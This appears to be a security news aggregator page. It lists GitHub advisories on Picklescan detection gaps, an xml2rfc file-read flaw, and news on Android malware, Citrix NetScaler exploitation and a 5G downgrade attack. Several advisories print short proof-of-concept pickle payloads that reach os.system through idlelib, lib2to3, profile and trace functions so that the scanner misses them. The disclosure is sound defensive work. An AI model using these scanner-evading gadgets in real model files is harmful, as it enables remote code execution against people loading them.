Security
Headlines
HeadlinesLatestCVEs

Latest News

GHSA-3vg9-h568-4w9m: Picklescan has a missing detection when calling built-in python idlelib.debugobj.ObjectTreeItem

### Summary Using idlelib.debugobj.ObjectTreeItem.SetText, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.debugobj.ObjectTreeItem.SetText function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilDebugobjSetText: def __reduce__(self): from idlelib.debugobj import ObjectTreeItem # ObjectTreeItem(..., setfunction=print).SetText(cmd) return ObjectTreeItem("label", None, print).SetText, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the im...

ghsa
Open in Source
#js#git#rce
GHSA-f54q-57x4-jg88: Picklescan has a missing detection when calling built-in python lib2to3.pgen2.grammar.Grammar.loads

### Summary Using lib2to3.pgen2.grammar.Grammar.loads, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to lib2to3.pgen2.grammar.Grammar.loads function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class Evil: def __reduce__(self): import os return (os.system, ('whoami',)) class EvilLib2to3Pgen2GrammarLoads: def __reduce__(self): from lib2to3.pgen2.grammar import Grammar payload = pickle.dumps(Evil()) # payload = b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.' return Grammar().loads, (payload,) `...

GHSA-6vqj-c2q5-j97w: Picklescan has a missing detection when calling built-in python profile.Profile.runctx

### Summary Using profile.Profile.runctx, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to profile.Profile.runctx function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilProfileRunctx: def __reduce__(self): from profile import Profile payload = "__import__('os').system('whoami')" return Profile.runctx, (Profile(), payload, {}, {}) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when th...

GHSA-x696-vm39-cp64: Picklescan has a missing detection when calling built-in python profile.Profile.run

### Summary Using profile.Profile.run, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to profile.Profile.run function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilProfileRun: def __reduce__(self): from profile import Profile payload = "__import__('os').system('whoami')" return Profile.run, (Profile(), payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loa...

GHSA-g344-hcph-8vgg: Picklescan has a missing detection when calling built-in python trace.Trace.runctx

### Summary Using trace.Trace.runctx, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to trace.Trace.runctx function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilTraceRunctx: def __reduce__(self): from trace import Trace payload = "__import__('os').system('whoami')" return Trace.runctx, (Trace(), payload, {}, {}) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is l...

GHSA-5qwp-399c-mjwf: Picklescan has a missing detection when calling built-in python trace.Trace.run

### Summary Using trace.Trace.run, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to trace.Trace.run function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilTraceRun: def __reduce__(self): from trace import Trace payload = "__import__('os').system('whoami')" return Trace.run, (Trace(), payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain ...

GHSA-cfmv-h8fx-85m7: xml2rfc has an arbitrary file read vulnerability

### Impact When generating PDF files, this vulnerability allows an attacker to read arbitrary files from the filesystem by injecting malicious link element into the XML. ### Workarounds Test untrusted input with `link` elements with `rel="attachment"` before processing. ### Credits This vulnerability was reported by Mohamed Ouad from [Doyensec](https://doyensec.com/).

Hook Android Trojan Now Delivers Ransomware-Style Attacks

New features to take over smartphones and monitor user activity demonstrate the continued evolution of the malware, which is now being spread on GitHub.

Citrix Patches Three NetScaler Flaws, Confirms Active Exploitation of CVE-2025-7775

Citrix has released fixes to address three security flaws in NetScaler ADC and NetScaler Gateway, including one that it said has been actively exploited in the wild. The vulnerabilities in question are listed below - CVE-2025-7775 (CVSS score: 9.2) - Memory overflow vulnerability leading to Remote Code Execution and/or Denial-of-Service CVE-2025-7776 (CVSS score: 8.8) - Memory overflow

New Sni5Gect Attack Crashes Phones and Downgrades 5G to 4G without Rogue Base Station

A team of academics has devised a novel attack that can be used to downgrade a 5G connection to a lower generation without relying on a rogue base station (gNB). The attack, per the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design (SUTD), relies on a new open-source software toolkit named Sni5Gect (short for "Sniffing 5G Inject") that's